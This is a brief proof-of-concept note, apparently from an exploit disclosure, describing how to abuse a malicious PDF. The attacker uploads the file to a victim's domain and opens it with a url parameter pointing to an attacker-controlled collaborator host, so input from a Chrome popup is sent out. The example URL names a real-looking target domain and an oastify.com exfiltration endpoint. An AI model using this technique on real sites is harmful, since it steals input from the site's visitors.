Just upload the pdf file to victim's domain

The open this file in victim's domain with url parameter is attacker's domain. (this file works fine in chrome)

Ex: http://www.flyseccorp.com/files/chrome_popup_send_input_by_lamscun.pdf?url=http://222finzjhx4uw5v59kirj6qcm3svgmcpetahz.oastify.com